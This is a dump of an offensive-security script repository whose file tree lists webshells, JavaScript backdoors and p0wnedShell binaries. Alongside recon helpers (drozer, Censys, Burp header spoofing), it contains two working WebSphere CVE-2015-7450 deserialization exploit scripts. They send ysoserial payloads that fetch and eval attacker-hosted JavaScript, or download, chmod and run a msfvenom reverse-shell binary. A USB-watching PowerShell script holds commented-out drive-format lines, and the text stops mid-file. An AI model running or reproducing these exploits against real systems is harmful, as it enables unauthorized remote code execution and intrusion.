├── Invoke-Shellcode.ps1 ├── README.md ├── SimpleHTTPServerWithUpload.py ├── android-strace ├── README.md ├── strace └── strace.rar ├── automate-drozer.py ├── burp-python-scripter └── add-header-random-ip.py ├── censys_ip_port_info.py ├── deserilization_exploit ├── test_websphere_CVE-2015-7450.sh ├── websphere_CVE-2015-7450.sh └── ysoserial-0.0.4-all.jar ├── exploit-writing ├── MSECExtensions_1_6_0.zip ├── README.md └── msecdbg-83548.zip ├── file-transfer ├── file_client.py ├── file_server.py └── ideone_transfer.py ├── format-usb.ps1 ├── generate-ssl-cert-key.txt ├── host-ip.ps1 ├── http-reflect.py ├── http-status.nse ├── ip-host.ps1 ├── ip2country.py ├── javascript-backdoor ├── JSRat.ps1 ├── README.md ├── py-jsrat.zip └── py-jsrat │ ├── JSRat.py │ └── classes │ ├── __init__.py │ └── colors.py ├── linuxprivchecker.py ├── nmap-files ├── nmap-ip-port-service-info-ssl-detect.py ├── nmap-ip-port-service-info.py ├── nmap-port-gen.py ├── nmap-top-ports.txt └── nmaptocsv.py ├── nmap-xml-parser.py ├── p0wnedshell ├── README.md ├── Smallp0wnedShell-x64.exe ├── Smallp0wnedShell-x86.exe ├── p0wnedShell-x64.exe └── p0wnedShell-x86.exe ├── patchextract.ps1 ├── port_response_time.py ├── ps-cmd.txt ├── quick-one-liners.md ├── shodan_ip_port_info.py ├── simple-https-server.py ├── web_capture.py ├── webshell ├── mysql-cmd-upload.php ├── shell.asp └── shell.php ├── websphere-xor-password-decode-encode.py ├── windows-bins ├── calc.exe ├── cmd.exe └── readme.md ├── wordpress ├── wordpress-plugins.txt ├── wordpress-themes.txt ├── wp_full_path_disclosure.py ├── wp_login_attack_jetpack.py ├── wp_login_user_enumeration.py ├── wp_plugin_enum.py ├── wp_user_enumeration_with_plugin_bypass.py └── wp_xss2rce.js ├── wordpress_plugins.txt ├── wordpress_themes.txt └── wpshell.zip /README.md: -------------------------------------------------------------------------------- 1 | # scripts-tools-shells 2 | -------------------------------------------------------------------------------- /SimpleHTTPServerWithUpload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """Simple HTTP Server With Upload. 4 | 5 | This module builds on BaseHTTPServer by implementing the standard GET 6 | and HEAD requests in a fairly straightforward manner. 7 | 8 | """ 9 | 10 | 11 | __version__ = "0.1" 12 | __all__ = ["SimpleHTTPRequestHandler"] 13 | __author__ = "bones7456" 14 | __home_page__ = "http://li2z.cn/" 15 | 16 | import os 17 | import posixpath 18 | import BaseHTTPServer 19 | import urllib 20 | import cgi 21 | import shutil 22 | import mimetypes 23 | import re 24 | try: 25 | from cStringIO import StringIO 26 | except ImportError: 27 | from StringIO import StringIO 28 | 29 | 30 | class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): 31 | 32 | """Simple HTTP request handler with GET/HEAD/POST commands. 33 | 34 | This serves files from the current directory and any of its 35 | subdirectories. The MIME type for files is determined by 36 | calling the .guess_type() method. And can reveive file uploaded 37 | by client. 38 | 39 | The GET/HEAD/POST requests are identical except that the HEAD 40 | request omits the actual contents of the file. 41 | 42 | """ 43 | 44 | server_version = "SimpleHTTPWithUpload/" + __version__ 45 | 46 | def do_GET(self): 47 | """Serve a GET request.""" 48 | f = self.send_head() 49 | if f: 50 | self.copyfile(f, self.wfile) 51 | f.close() 52 | 53 | def do_HEAD(self): 54 | """Serve a HEAD request.""" 55 | f = self.send_head() 56 | if f: 57 | f.close() 58 | 59 | def do_POST(self): 60 | """Serve a POST request.""" 61 | r, info = self.deal_post_data() 62 | print r, info, "by: ", self.client_address 63 | f = StringIO() 64 | f.write('') 65 | f.write("\nUpload Result Page\n") 66 | f.write("\n

Upload Result Page

\n") 67 | f.write("
\n") 68 | if r: 69 | f.write("Success:") 70 | else: 71 | f.write("Failed:") 72 | f.write(info) 73 | f.write("
back" % self.headers['referer']) 74 | f.write("
Powerd By: bones7456, check new version at ") 75 | f.write("") 76 | f.write("here.\n\n") 77 | length = f.tell() 78 | f.seek(0) 79 | self.send_response(200) 80 | self.send_header("Content-type", "text/html") 81 | self.send_header("Content-Length", str(length)) 82 | self.end_headers() 83 | if f: 84 | self.copyfile(f, self.wfile) 85 | f.close() 86 | 87 | def deal_post_data(self): 88 | boundary = self.headers.plisttext.split("=")[1] 89 | remainbytes = int(self.headers['content-length']) 90 | line = self.rfile.readline() 91 | remainbytes -= len(line) 92 | if not boundary in line: 93 | return (False, "Content NOT begin with boundary") 94 | line = self.rfile.readline() 95 | remainbytes -= len(line) 96 | fn = re.findall(r'Content-Disposition.*name="file"; filename="(.*)"', line) 97 | if not fn: 98 | return (False, "Can't find out file name...") 99 | path = self.translate_path(self.path) 100 | fn = os.path.join(path, fn[0]) 101 | line = self.rfile.readline() 102 | remainbytes -= len(line) 103 | line = self.rfile.readline() 104 | remainbytes -= len(line) 105 | try: 106 | out = open(fn, 'wb') 107 | except IOError: 108 | return (False, "Can't create file to write, do you have permission to write?") 109 | 110 | preline = self.rfile.readline() 111 | remainbytes -= len(preline) 112 | while remainbytes > 0: 113 | line = self.rfile.readline() 114 | remainbytes -= len(line) 115 | if boundary in line: 116 | preline = preline[0:-1] 117 | if preline.endswith('\r'): 118 | preline = preline[0:-1] 119 | out.write(preline) 120 | out.close() 121 | return (True, "File '%s' upload success!" % fn) 122 | else: 123 | out.write(preline) 124 | preline = line 125 | return (False, "Unexpect Ends of data.") 126 | 127 | def send_head(self): 128 | """Common code for GET and HEAD commands. 129 | 130 | This sends the response code and MIME headers. 131 | 132 | Return value is either a file object (which has to be copied 133 | to the outputfile by the caller unless the command was HEAD, 134 | and must be closed by the caller under all circumstances), or 135 | None, in which case the caller has nothing further to do. 136 | 137 | """ 138 | path = self.translate_path(self.path) 139 | f = None 140 | if os.path.isdir(path): 141 | if not self.path.endswith('/'): 142 | # redirect browser - doing basically what apache does 143 | self.send_response(301) 144 | self.send_header("Location", self.path + "/") 145 | self.end_headers() 146 | return None 147 | for index in "index.html", "index.htm": 148 | index = os.path.join(path, index) 149 | if os.path.exists(index): 150 | path = index 151 | break 152 | else: 153 | return self.list_directory(path) 154 | ctype = self.guess_type(path) 155 | try: 156 | # Always read in binary mode. Opening files in text mode may cause 157 | # newline translations, making the actual size of the content 158 | # transmitted *less* than the content-length! 159 | f = open(path, 'rb') 160 | except IOError: 161 | self.send_error(404, "File not found") 162 | return None 163 | self.send_response(200) 164 | self.send_header("Content-type", ctype) 165 | fs = os.fstat(f.fileno()) 166 | self.send_header("Content-Length", str(fs[6])) 167 | self.send_header("Last-Modified", self.date_time_string(fs.st_mtime)) 168 | self.end_headers() 169 | return f 170 | 171 | def list_directory(self, path): 172 | """Helper to produce a directory listing (absent index.html). 173 | 174 | Return value is either a file object, or None (indicating an 175 | error). In either case, the headers are sent, making the 176 | interface the same as for send_head(). 177 | 178 | """ 179 | try: 180 | list = os.listdir(path) 181 | except os.error: 182 | self.send_error(404, "No permission to list directory") 183 | return None 184 | list.sort(key=lambda a: a.lower()) 185 | f = StringIO() 186 | displaypath = cgi.escape(urllib.unquote(self.path)) 187 | f.write('') 188 | f.write("\nDirectory listing for %s\n" % displaypath) 189 | f.write("\n

Directory listing for %s

\n" % displaypath) 190 | f.write("
\n") 191 | f.write("
") 192 | f.write("") 193 | f.write("
\n") 194 | f.write("
\n\n
\n\n\n") 208 | length = f.tell() 209 | f.seek(0) 210 | self.send_response(200) 211 | self.send_header("Content-type", "text/html") 212 | self.send_header("Content-Length", str(length)) 213 | self.end_headers() 214 | return f 215 | 216 | def translate_path(self, path): 217 | """Translate a /-separated PATH to the local filename syntax. 218 | 219 | Components that mean special things to the local file system 220 | (e.g. drive or directory names) are ignored. (XXX They should 221 | probably be diagnosed.) 222 | 223 | """ 224 | # abandon query parameters 225 | path = path.split('?',1)[0] 226 | path = path.split('#',1)[0] 227 | path = posixpath.normpath(urllib.unquote(path)) 228 | words = path.split('/') 229 | words = filter(None, words) 230 | path = os.getcwd() 231 | for word in words: 232 | drive, word = os.path.splitdrive(word) 233 | head, word = os.path.split(word) 234 | if word in (os.curdir, os.pardir): continue 235 | path = os.path.join(path, word) 236 | return path 237 | 238 | def copyfile(self, source, outputfile): 239 | """Copy all data between two file objects. 240 | 241 | The SOURCE argument is a file object open for reading 242 | (or anything with a read() method) and the DESTINATION 243 | argument is a file object open for writing (or 244 | anything with a write() method). 245 | 246 | The only reason for overriding this would be to change 247 | the block size or perhaps to replace newlines by CRLF 248 | -- note however that this the default server uses this 249 | to copy binary data as well. 250 | 251 | """ 252 | shutil.copyfileobj(source, outputfile) 253 | 254 | def guess_type(self, path): 255 | """Guess the type of a file. 256 | 257 | Argument is a PATH (a filename). 258 | 259 | Return value is a string of the form type/subtype, 260 | usable for a MIME Content-type header. 261 | 262 | The default implementation looks the file's extension 263 | up in the table self.extensions_map, using application/octet-stream 264 | as a default; however it would be permissible (if 265 | slow) to look inside the data to make a better guess. 266 | 267 | """ 268 | 269 | base, ext = posixpath.splitext(path) 270 | if ext in self.extensions_map: 271 | return self.extensions_map[ext] 272 | ext = ext.lower() 273 | if ext in self.extensions_map: 274 | return self.extensions_map[ext] 275 | else: 276 | return self.extensions_map[''] 277 | 278 | if not mimetypes.inited: 279 | mimetypes.init() # try to read system mime.types 280 | extensions_map = mimetypes.types_map.copy() 281 | extensions_map.update({ 282 | '': 'application/octet-stream', # Default 283 | '.py': 'text/plain', 284 | '.c': 'text/plain', 285 | '.h': 'text/plain', 286 | }) 287 | 288 | 289 | def test(HandlerClass = SimpleHTTPRequestHandler, 290 | ServerClass = BaseHTTPServer.HTTPServer): 291 | BaseHTTPServer.test(HandlerClass, ServerClass) 292 | 293 | if __name__ == '__main__': 294 | test() 295 | -------------------------------------------------------------------------------- /android-strace/README.md: -------------------------------------------------------------------------------- 1 | # Android Strace 2 | 3 | Obtained binary strace file for Android from https://forum.xda-developers.com/showpost.php?p=76141375&postcount=3458 4 | 5 | ```IMPORTANT: Use with caution, this is binary file obtained from untrusted source. Use at your own risk.``` 6 | -------------------------------------------------------------------------------- /android-strace/strace: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/android-strace/strace -------------------------------------------------------------------------------- /android-strace/strace.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/android-strace/strace.rar -------------------------------------------------------------------------------- /automate-drozer.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | import sys 3 | 4 | if len(sys.argv)<3: 5 | print "Usage: " + sys.argv[0] + " " 6 | print "Usage: " + sys.argv[0] + " " + "c:\\drozer\\drozer.bat" 7 | exit(0) 8 | 9 | #Path to your drozer file 10 | drozer_path = sys.argv[2] 11 | #drozer_path = "c:\\drozer\\drozer.bat" 12 | #Store HTML output 13 | html = "Report: %s

%s

" % (sys.argv[1],sys.argv[1]) 14 | 15 | def execute_test(test, pname,e=0): 16 | drozer_cmd = drozer_path + ' console connect -c "run ' + test + ' ' + pname + '"' 17 | if e==1: 18 | drozer_cmd = drozer_path + ' console connect -c "run ' + test + ' ' + '"' 19 | process = subprocess.Popen(drozer_cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) 20 | input,output,error = process.stdin,process.stdout,process.stderr 21 | #input.write("hello world !") 22 | data = output.read().decode('latin1') 23 | input.close() 24 | output.close() 25 | status = process.wait() 26 | if int(data.find("could not find the package"))!=-1: 27 | data = "Invalid package" 28 | else: 29 | #print "Valid package" 30 | pass 31 | return data 32 | 33 | def process_data(heading, out): 34 | html_out = 1 35 | separator = ("*"*50) 36 | print "\n%s:\n%s\n%s" % (heading,separator,out) 37 | out = out.replace("&","&").replace("<","<").replace(">",">").replace("\\n","
").replace("\\r","") 38 | if html_out: 39 | global html 40 | html += "
" + heading + "
" + out + "


" 41 | 42 | if __name__ == '__main__': 43 | pname = sys.argv[1] 44 | separator = ("*"*50) 45 | #Get package information 46 | package_info = execute_test('app.package.info -a', pname) 47 | process_data("Package Information", package_info) 48 | #Get activity information 49 | activity_info = execute_test('app.activity.info -i -u -a', pname) 50 | process_data("Activities Information", activity_info) 51 | #Get broadcast receiver information 52 | broadcast_info = execute_test('app.broadcast.info -i -u -a', pname) 53 | process_data("Broadcast Receivers Information", broadcast_info) 54 | #Get attack surface details 55 | attacksurface_info = execute_test('app.package.attacksurface', pname) 56 | process_data("Attack Surface Information", attacksurface_info) 57 | #Get package with backup API details 58 | backupapi_info = execute_test('app.package.backup -f', pname) 59 | process_data("Package with Backup API Information", backupapi_info) 60 | #Get Android Manifest of the package 61 | manifest_info = execute_test('app.package.manifest', pname) 62 | process_data("Android Manifest File", manifest_info) 63 | #Get native libraries information 64 | nativelib_info = execute_test('app.package.native', pname) 65 | process_data("Native Libraries used", nativelib_info) 66 | #Get content provider information 67 | contentprovider_info = execute_test('app.provider.info -u -a', pname) 68 | process_data("Content Provider Information", contentprovider_info) 69 | #Get URIs from package 70 | finduri_info = execute_test('app.provider.finduri', pname) 71 | process_data("Content Provider URIs", finduri_info) 72 | #Get services information 73 | services_info = execute_test('app.service.info -i -u -a', pname) 74 | process_data("Services Information", services_info) 75 | #Get native components included in package 76 | nativecomponents_info = execute_test('scanner.misc.native -a', pname) 77 | process_data("Native Components in Package", nativecomponents_info) 78 | #Get world readable files in app installation directory /data/data// 79 | worldreadable_info = execute_test('scanner.misc.readablefiles /data/data/'+pname+'/', pname, 1) 80 | process_data("World Readable Files in App Installation Location", worldreadable_info) 81 | #Get world writeable files in app installation directory /data/data// 82 | worldwriteable_info = execute_test('scanner.misc.readablefiles /data/data/'+pname+'/', pname, 1) 83 | process_data("World Writeable Files in App Installation Location", worldwriteable_info) 84 | #Get content providers that can be queried from current context 85 | querycp_info = execute_test('scanner.provider.finduris -a', pname) 86 | process_data("Content Providers Query from Current Context", querycp_info) 87 | #Perform SQL Injection on content providers 88 | sqli_info = execute_test('scanner.provider.injection -a', pname) 89 | process_data("SQL Injection on Content Providers", sqli_info) 90 | #Find SQL Tables trying SQL Injection 91 | sqltables_info = execute_test('scanner.provider.sqltables -a', pname) 92 | process_data("SQL Tables using SQL Injection", sqltables_info) 93 | #Test for directory traversal vulnerability 94 | dirtraversal_info = execute_test('scanner.provider.traversal -a', pname) 95 | process_data("Directory Traversal using Content Provider", dirtraversal_info) 96 | html += "" 97 | f = open("report.html","w") 98 | f.write(html.encode("utf-8")) 99 | f.close() 100 | print "[*] 'report.html' with testing results saved"; 101 | -------------------------------------------------------------------------------- /burp-python-scripter/add-header-random-ip.py: -------------------------------------------------------------------------------- 1 | def generate_random_ip(): 2 | import random 3 | n1 = str(random.randint(0,256)) 4 | n2 = str(random.randint(0,256)) 5 | n3 = str(random.randint(0,256)) 6 | n4 = str(random.randint(0,256)) 7 | random_ip = "%s.%s.%s.%s" % (n1,n2,n3,n4) 8 | #print random_ip 9 | return random_ip 10 | 11 | if messageIsRequest: 12 | #if toolFlag in (callbacks.TOOL_PROXY,): 13 | if toolFlag not in (callbacks.TOOL_EXTENDER,): 14 | #if callbacks.isInScope(messageInfo.getUrl()): 15 | requestInfo = helpers.analyzeRequest(messageInfo.getRequest()) 16 | headers = requestInfo.getHeaders() 17 | requestBody = messageInfo.getRequest()[requestInfo.getBodyOffset():] 18 | headers.add('X-Forwarded-For: %s' % generate_random_ip()) 19 | headers.add('X-Originating-IP: %s' % generate_random_ip()) 20 | headers.add('X-Remote-IP: %s' % generate_random_ip()) 21 | headers.add('X-Remote-Addr: %s' % generate_random_ip()) 22 | headers.add('X-Client-IP: %s' % generate_random_ip()) 23 | request = helpers.buildHttpMessage(headers, requestBody) 24 | messageInfo.setRequest(request) 25 | -------------------------------------------------------------------------------- /censys_ip_port_info.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | #Usage: python censys_ip_port_info.py 4 | #Example: python censys_ip_port_info.py ip_list.lst 5 | 6 | #Data source: https://www.censys.io/ 7 | 8 | #Author: Interference Security 9 | 10 | import sys 11 | import json 12 | import requests 13 | 14 | f = open(sys.argv[1],"r") 15 | all_ips = f.readlines() 16 | for ip_addr in all_ips: 17 | API_URL = "https://www.censys.io/api/v1" 18 | #Visit https://www.censys.io/account to get UID and SECRET 19 | UID = "YOUR_UID_OR_API_ID_HERE" 20 | SECRET = "YOUR_SECRET_HERE" 21 | ip_addr = (ip_addr.replace("\r","")).replace("\n","") 22 | post_data = '{"query":"'+ip_addr+'", "fields":["ip", "protocols"]}' 23 | 24 | res = requests.post(API_URL + "/search/ipv4", auth=(UID, SECRET), data=post_data) 25 | if res.status_code != 200: 26 | print ip_addr + ",Error,Error" 27 | else: 28 | # print res.text 29 | if len(res.json()["results"])>0: 30 | temp = (res.json()["results"])[0] 31 | res_ip = temp["ip"] 32 | res_protocols = temp["protocols"] 33 | for port_protocol in res_protocols: 34 | pp = port_protocol.split("/") 35 | print res_ip + "," + pp[0] + "," + pp[1] 36 | -------------------------------------------------------------------------------- /deserilization_exploit/test_websphere_CVE-2015-7450.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Inteference Security 4 | # Twitter: https://twitter.com/xploresec 5 | # Credits: foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ 6 | 7 | if [ $# -lt 4 ]; then 8 | echo "$0 " 9 | exit 10 | fi 11 | 12 | target_ip=$1 13 | target_port=$2 14 | target_type=$3 15 | target_prot=$4 16 | 17 | final_target="$target_prot://$target_ip:$target_port" 18 | 19 | echo "[*] Target: $final_target" 20 | echo "[*] Type: $target_type" 21 | echo "" 22 | 23 | if [ "$target_type" == "windows" ]; then 24 | echo "[*] Attacking Windows target" 25 | echo "" 26 | echo "Make sure you have one of the two setup and ready before continuing:" 27 | echo "1. Python JSRat: https://github.com/interference-security/scripts-tools-shells/tree/master/javascript-backdoor/py-jsrat" 28 | echo "2. PowerShell JSRat: https://github.com/interference-security/scripts-tools-shells/blob/master/javascript-backdoor/JSRat.ps1" 29 | echo "" 30 | read -p "Enter IP to receive reverse shell: " attacker_ip 31 | echo "" 32 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "rundll32.exe javascript:\"\..\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://$attacker_ip/connect\",false);h.Send();B=h.ResponseText;eval(B)" | base64 -w 0` 33 | final_payload="BasicAuth$payloadringBufferSize" 34 | echo "[*] Sending exploit payload" 35 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 36 | fi 37 | 38 | if [ "$target_type" == "linux" ]; then 39 | echo "[*] Attacking Linux target" 40 | echo "" 41 | echo "Make sure you have one of the two setup and ready before continuing:" 42 | echo "1. Python JSRat: https://github.com/interference-security/scripts-tools-shells/tree/master/javascript-backdoor/py-jsrat" 43 | echo "2. PowerShell JSRat: https://github.com/interference-security/scripts-tools-shells/blob/master/javascript-backdoor/JSRat.ps1" 44 | echo "" 45 | read -p "Enter attacker IP address: " attacker_ip 46 | echo "" 47 | read -p "Enter port to start webserver on: " web_port 48 | echo "" 49 | echo "[*] Starting webserver on port $web_port" 50 | python -m SimpleHTTPServer $web_port & 51 | # Upload Metasploit payload on target server 52 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "wget -O /tmp/ibmwsexp http://$attacker_ip:$web_port/ibmwsexp" | base64 -w 0` 53 | final_payload="BasicAuth$payloadringBufferSize" 54 | echo "" 55 | echo "[*] Sending exploit payload to check for vulnerability" 56 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 57 | read -p "Press [ENTER] to stop..." 58 | trap 'kill $(jobs -p)' EXIT 59 | fi 60 | -------------------------------------------------------------------------------- /deserilization_exploit/websphere_CVE-2015-7450.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Inteference Security 4 | # Twitter: https://twitter.com/xploresec 5 | # Credits: foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ 6 | 7 | if [ $# -lt 4 ]; then 8 | echo "$0 " 9 | exit 10 | fi 11 | 12 | target_ip=$1 13 | target_port=$2 14 | target_type=$3 15 | target_prot=$4 16 | 17 | final_target="$target_prot://$target_ip:$target_port" 18 | 19 | echo "[*] Target: $final_target" 20 | echo "[*] Type: $target_type" 21 | echo "" 22 | 23 | if [ "$target_type" == "windows" ]; then 24 | echo "[*] Attacking Windows target" 25 | echo "" 26 | echo "Make sure you have one of the two setup and ready before continuing:" 27 | echo "1. Python JSRat: https://github.com/interference-security/scripts-tools-shells/tree/master/javascript-backdoor/py-jsrat" 28 | echo "2. PowerShell JSRat: https://github.com/interference-security/scripts-tools-shells/blob/master/javascript-backdoor/JSRat.ps1" 29 | echo "" 30 | read -p "Enter IP to receive reverse shell: " attacker_ip 31 | echo "" 32 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "rundll32.exe javascript:\"\..\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");h.Open(\"GET\",\"http://$attacker_ip/connect\",false);h.Send();B=h.ResponseText;eval(B)" | base64 -w 0` 33 | final_payload="BasicAuth$payloadringBufferSize" 34 | echo "[*] Sending exploit payload" 35 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 36 | fi 37 | 38 | if [ "$target_type" == "linux" ]; then 39 | echo "[*] Attacking Linux target" 40 | echo "" 41 | echo "Make sure you have one of the two setup and ready before continuing:" 42 | echo "1. Python JSRat: https://github.com/interference-security/scripts-tools-shells/tree/master/javascript-backdoor/py-jsrat" 43 | echo "2. PowerShell JSRat: https://github.com/interference-security/scripts-tools-shells/blob/master/javascript-backdoor/JSRat.ps1" 44 | echo "" 45 | read -p "Enter IP to receive reverse shell: " attacker_ip 46 | read -p "Enter port to receive reverse shell: " attacker_port 47 | echo "" 48 | echo "[*] Generating Metasploit payload" 49 | msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=$attacker_ip LPORT=$attacker_port -b '\\x00' -e x86/shikata_ga_nai -f elf -o ./ibmwsexp 50 | echo "" 51 | read -p "Enter port to start webserver on: " web_port 52 | echo "" 53 | echo "[*] Starting webserver on port $web_port" 54 | python -m SimpleHTTPServer $web_port & 55 | # Upload Metasploit payload on target server 56 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "wget -O /tmp/ibmwsexp http://$attacker_ip:$web_port/ibmwsexp" | base64 -w 0` 57 | final_payload="BasicAuth$payloadringBufferSize" 58 | echo "" 59 | echo "[*] Sending exploit payload to download Metasploit payload" 60 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 61 | # Make uploaded Metasploit payload executable 62 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "chmod a+x /tmp/ibmwsexp" | base64 -w 0` 63 | final_payload="BasicAuth$payloadringBufferSize" 64 | echo "[*] Making uploaded Metasploit payload executable" 65 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 66 | # Execute uploaded Metasploit payload 67 | payload=`java -jar ysoserial-0.0.4-all.jar CommonsCollections1 "/tmp/ibmwsexp" | base64 -w 0` 68 | final_payload="BasicAuth$payloadringBufferSize" 69 | echo "" 70 | echo "[*] Open msfconsole and execute the following commands:" 71 | echo "use exploit/multi/handler" 72 | echo "set PAYLOAD linux/x86/shell/reverse_tcp" 73 | echo "set LHOST $attacker_ip" 74 | echo "set LPORT $attacker_port" 75 | echo "exploit" 76 | echo "" 77 | read -p "[*] Press ENTER to execute Metasploit payload: " anything 78 | echo "" 79 | echo "[*] Executing uploaded Metasploit payload" 80 | send_payload=`curl -s --insecure -i -H "Content-Type: text/xml; charset=utf-8" -H "SOAPAction: \"urn:AdminService\"" -H "User-Agent:" -H "Accept:" -H "Expect:" $final_target -X POST -d "$final_payload"` 81 | trap 'kill $(jobs -p)' EXIT 82 | fi 83 | -------------------------------------------------------------------------------- /deserilization_exploit/ysoserial-0.0.4-all.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/deserilization_exploit/ysoserial-0.0.4-all.jar -------------------------------------------------------------------------------- /exploit-writing/MSECExtensions_1_6_0.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/exploit-writing/MSECExtensions_1_6_0.zip -------------------------------------------------------------------------------- /exploit-writing/README.md: -------------------------------------------------------------------------------- 1 | # Tools for exploit writing 2 | -------------------------------------------------------------------------------- /exploit-writing/msecdbg-83548.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/interference-security/scripts-tools-shells/3d67f32e0a7bb0f784a3dd4f64b3fdbab2fe4169/exploit-writing/msecdbg-83548.zip -------------------------------------------------------------------------------- /file-transfer/file_client.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | 4 | if len(sys.argv)!=4: 5 | print "\nUsage: file_client.py " 6 | sys.exit(1) 7 | s = socket.socket() 8 | s.connect((sys.argv[1],int(sys.argv[2]))) 9 | f=open (sys.argv[3], "rb") 10 | l = f.read(102400) 11 | while (l): 12 | s.send(l) 13 | l = f.read(102400) 14 | s.close() 15 | -------------------------------------------------------------------------------- /file-transfer/file_server.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import sys 3 | 4 | if len(sys.argv)!=3: 5 | print "\nUsage: file_server.py " 6 | sys.exit(1) 7 | s = socket.socket() 8 | s.bind(("0.0.0.0",int(sys.argv[1]))) 9 | s.listen(10) 10 | 11 | while True: 12 | sc, address = s.accept() 13 | print address 14 | f = open(sys.argv[2],'wb') 15 | #while (True): 16 | l = sc.recv(102400) 17 | print "[*] Writing to file" 18 | while (l): 19 | f.write(l) 20 | #print l 21 | l = sc.recv(102400) 22 | 23 | f.close() 24 | print "[*] File created" 25 | sc.close() 26 | break 27 | s.close() 28 | -------------------------------------------------------------------------------- /file-transfer/ideone_transfer.py: -------------------------------------------------------------------------------- 1 | try: 2 | import requests 3 | import sys 4 | except Exception,e: 5 | print "[!] Error: "+str(e) 6 | print "[*] Make sure you have the following Python modules installed:\n\BeautifulSoup, requests, sys" 7 | exit(0) 8 | 9 | if(len(sys.argv)!=3): 10 | print "Usage: " + sys.argv[0] + " " 11 | print "Example: " + sys.argv[0] + "abcdef hello" 12 | exit(0) 13 | 14 | #proxies = {"http": "http://127.0.0.1:9092", "https": "http://127.0.0.1:9092",} 15 | 16 | #abc123 17 | ideone_id = sys.argv[1] 18 | user_content = sys.argv[2] 19 | 20 | #Configuration (First 3 required) 21 | PHPSESSID = "" 22 | JIDEONE = "" 23 | settings = "" 24 | _ga = "" 25 | _gat = "" 26 | __unam = "" 27 | 28 | cookies = {"PHPSESSID":PHPSESSID, "JIDEONE":JIDEONE, "settings":settings} 29 | post_data = {"input":"", "source":user_content, "link":ideone_id, "only_save":"false"} 30 | r = requests.post("http://ideone.com/submitedit", data=post_data, cookies=cookies, proxies=proxies, verify=False) 31 | sc = r.text 32 | #print sc 33 | r = requests.post("http://ideone.com/plain/"+ideone_id, data=post_data, cookies=cookies, verify=False) 34 | sc2 = r.text 35 | print sc2 36 | -------------------------------------------------------------------------------- /format-usb.ps1: -------------------------------------------------------------------------------- 1 | $usbdrives = Get-WmiObject Win32_Volume -Filter "DriveType='2'"|select -expand driveletter 2 | $usbdrives = $usbdrives.Trim(":") 3 | #THIS WILL FORMAT THE DRIVE 4 | #Format-Volume -DriveLetter $usbdrives -NewFileSystemLabel MyDrive -FileSystem NTFS -Confirm:$false 5 | #notepad $usbdrives 6 | Unregister-Event -SourceIdentifier volumeChange -ErrorAction SilentlyContinue 7 | Register-WmiEvent -Class win32_VolumeChangeEvent -SourceIdentifier volumeChange -ErrorAction SilentlyContinue 8 | #write-host (get-date -format s) " Beginning script..." 9 | do 10 | { 11 | $newEvent = Wait-Event -SourceIdentifier volumeChange 12 | $eventType = $newEvent.SourceEventArgs.NewEvent.EventType 13 | $eventTypeName = switch($eventType) 14 | { 15 | 1 {"Configuration changed"} 16 | 2 {"Device arrival"} 17 | 3 {"Device removal"} 18 | 4 {"docking"} 19 | } 20 | #write-host (get-date -format s) " Event detected = " $eventTypeName 21 | if ($eventType -eq 2) 22 | { 23 | $driveLetter = $newEvent.SourceEventArgs.NewEvent.DriveName 24 | $driveLabel = ([wmi]"Win32_LogicalDisk='$driveLetter'").VolumeName 25 | #write-host (get-date -format s) " Drive name = " $driveLetter 26 | #write-host (get-date -format s) " Drive label = " $driveLabel 27 | $driveLetter = $driveLetter.Trim(":") 28 | #write-host $driveLetter 29 | 30 | #THIS WILL FORMAT THE DRIVE 31 | #Format-Volume -DriveLetter $driveLetter 